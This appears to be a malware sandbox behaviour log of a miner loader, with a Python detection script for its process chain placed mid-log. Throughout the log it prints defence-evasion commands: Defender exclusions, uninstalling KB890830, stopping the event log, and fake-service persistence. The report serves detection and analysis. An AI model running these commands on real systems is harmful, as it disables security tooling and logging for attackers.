                      Source: C:\Windows\System32\dialer.exeCode function: 17_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,17_2_00000001400019C4
                      Source: C:\Windows\System32\dialer.exeCode function: 17_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,17_2_000000014000226C
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe.log
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2460:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7388:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7604:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7248:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2292:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7560:120:WilError_03
                      Source: C:\Windows\System32\dialer.exeMutant created: \BaseNamedObjects\Global\cwzyhcjpggltbmjx
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:576:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5656:120:WilError_03
                      Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
                      Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1896:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7660:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7576:120:WilError_03
                      Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6436:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7632:120:WilError_03
                      Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r5hfiz3n.jvw.ps1
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                      Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeFile read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\SysWOW64\system64x.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\ProgramData\Google\Chrome\updater.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeReversingLabs: Detection: 47%
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe:Zone.Identifier
                      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess created: C:\Windows\SysWOW64\system64x.exe "C:\Windows\SysWOW64\system64x.exe"
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\ProgramData\Google\Chrome\updater.exe C:\ProgramData\Google\Chrome\updater.exe
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe dialer.exe
                      Source: C:\Windows\System32\dialer.exeProcess created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
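The process-creation chain listed above (Defender exclusions via Add-MpPreference, removal of KB890830, powercfg timeouts set to 0, a service registered from C:\ProgramData, the EventLog service stopped, dialer.exe launched with no arguments and in turn spawning WMIADAP.exe) is a detection opportunity on its own, independent of the miner payload. The following is an added example, not part of the Joe Sandbox report: a small Python triage script that encodes each of those tells as a rule over Sysmon Event ID 1 style fields (parent image, image, command line). The field shape, the parent allow-list in the dialer.exe rule and the sample events are assumptions; the events are constructed to mirror the report's "Process created" lines and are not an export of the sandbox's log.

```python
"""Process-creation triage for the XMRig loader chain in this report.

Added example (not part of the Joe Sandbox report). Assumes Sysmon EID 1 style
fields (parent image, image, command line); the events below are constructed
to mirror the report's "Process created" lines, not a real log export.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str    # parent image path
    image: str     # created image path
    cmdline: str   # full command line


def _base(path: str) -> str:
    """File name of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


# Each rule maps one tell from the report to a predicate over a single event.
def defender_exclusion(e: ProcEvent) -> bool:
    cl = e.cmdline.lower()
    return (_base(e.image) in ("powershell.exe", "pwsh.exe")
            and "add-mppreference" in cl
            and ("-exclusionpath" in cl or "-exclusionextension" in cl))

def msrt_removal(e: ProcEvent) -> bool:
    # KB890830 is the Malicious Software Removal Tool; uninstalling it via
    # wusa is a defence-evasion step, not maintenance.
    cl = e.cmdline.lower()
    return "wusa" in cl and "/uninstall" in cl and "890830" in cl

def no_sleep(e: ProcEvent) -> bool:
    return (_base(e.image) == "powercfg.exe" and re.search(
        r"-(standby|hibernate)-timeout-(ac|dc)\s+0\b", e.cmdline.lower()) is not None)

def service_in_programdata(e: ProcEvent) -> bool:
    cl = e.cmdline.lower()
    return (_base(e.image) == "sc.exe" and " create " in cl
            and "binpath=" in cl and "\\programdata\\" in cl)

def eventlog_stop(e: ProcEvent) -> bool:
    return (_base(e.image) == "sc.exe"
            and re.search(r'\bstop\s+"?eventlog"?', e.cmdline.lower()) is not None)

def dialer_as_injection_host(e: ProcEvent) -> bool:
    # dialer.exe started with no arguments by a non-shell parent; the report
    # shows it as the host the miner is injected into. The parent allow-list
    # is an assumption to tune per environment.
    cl = e.cmdline.strip().lower().rstrip('"')
    return (_base(e.image) == "dialer.exe" and cl.endswith("dialer.exe")
            and _base(e.parent) not in ("explorer.exe",))

def wmiadap_from_dialer(e: ProcEvent) -> bool:
    # WMIADAP.exe normally descends from the WMI service host, never dialer.exe.
    return _base(e.image) == "wmiadap.exe" and _base(e.parent) == "dialer.exe"


RULES = {f.__name__: f for f in (defender_exclusion, msrt_removal, no_sleep,
                                 service_in_programdata, eventlog_stop,
                                 dialer_as_injection_host, wmiadap_from_dialer)}


def evaluate(events) -> dict:
    """Return {rule_name: [matching events]} for every rule that fired."""
    hits: dict = {}
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                hits.setdefault(name, []).append(e)
    return hits


def verdict(hits: dict, threshold: int = 3) -> str:
    """Any one rule is a lead; several distinct rules on one host is the chain."""
    if len(hits) >= threshold:
        return "malicious"
    return "suspicious" if hits else "clean"


# Constructed sample: the report's chain plus two benign control events.
S64 = r"C:\Windows\SysWOW64\system64x.exe"
UPD = r"C:\ProgramData\Google\Chrome\updater.exe"
SYS = r"C:\Windows\System32"
SAMPLE_EVENTS = [
    ProcEvent(S64, SYS + r"\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, "
              "$env:ProgramData) -ExclusionExtension '.exe' -Force"),
    ProcEvent(S64, SYS + r"\cmd.exe", "cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart"),
    ProcEvent(S64, SYS + r"\powercfg.exe", "powercfg.exe /x -standby-timeout-ac 0"),
    ProcEvent(S64, SYS + r"\sc.exe", 'sc.exe create "GoogleUpdateTaskMachineQC" '
              r'binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"'),
    ProcEvent(S64, SYS + r"\sc.exe", "sc.exe stop eventlog"),
    ProcEvent(UPD, SYS + r"\dialer.exe", SYS + r"\dialer.exe"),
    ProcEvent(SYS + r"\dialer.exe", SYS + r"\wbem\WMIADAP.exe", "wmiadap.exe /F /T /R"),
    ProcEvent(r"C:\Windows\explorer.exe", SYS + r"\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Get-MpPreference"),
    ProcEvent(SYS + r"\services.exe", SYS + r"\svchost.exe", "svchost.exe -k netsvcs -p"),
]

if __name__ == "__main__":
    found = evaluate(SAMPLE_EVENTS)
    for name, evs in found.items():
        print(f"{name}: {len(evs)} event(s)")
    print("verdict:", verdict(found))
```

The threshold in `verdict` is deliberately conservative: a lone `powercfg` change or a single Defender exclusion is common admin noise, but three or more of these rules firing from the same parent chain within a short window has no benign explanation and matches the report's sequence exactly. Note that the EventLog stop (sc stop eventlog) means host-side Security/System logs after that point are unreliable; feed this from a forwarded telemetry source such as Sysmon shipped off-host rather than from the local event log.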
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess created: C:\Windows\SysWOW64\system64x.exe "C:\Windows\SysWOW64\system64x.exe"
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe dialer.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: mscoree.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: version.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: wldp.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: msisip.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: wshext.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: appxsip.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: opcservices.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: profapi.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: secur32.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: amsi.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: userenv.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: gpapi.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: urlmon.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: iertutil.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: srvcli.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: netutils.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: propsys.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: wininet.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: mswsock.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: mi.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: miutils.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: wsmsvc.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: dsrole.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: pcwum.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: winhttp.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: textshaping.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: textinputframework.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: coreuicomponents.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: coremessaging.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: ntmarta.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: rasapi32.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: rasman.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: rtutils.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: iphlpapi.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: dhcpcsvc.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: dnsapi.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: winnsi.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: rasadhlp.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: schannel.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: mskeyprotect.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: ntasn1.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: ncrypt.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: ncryptsslp.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: edputil.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: appresolver.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: bcp47langs.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: slc.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: sppc.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Section loaded: onecoreuapcommonproxystub.dll
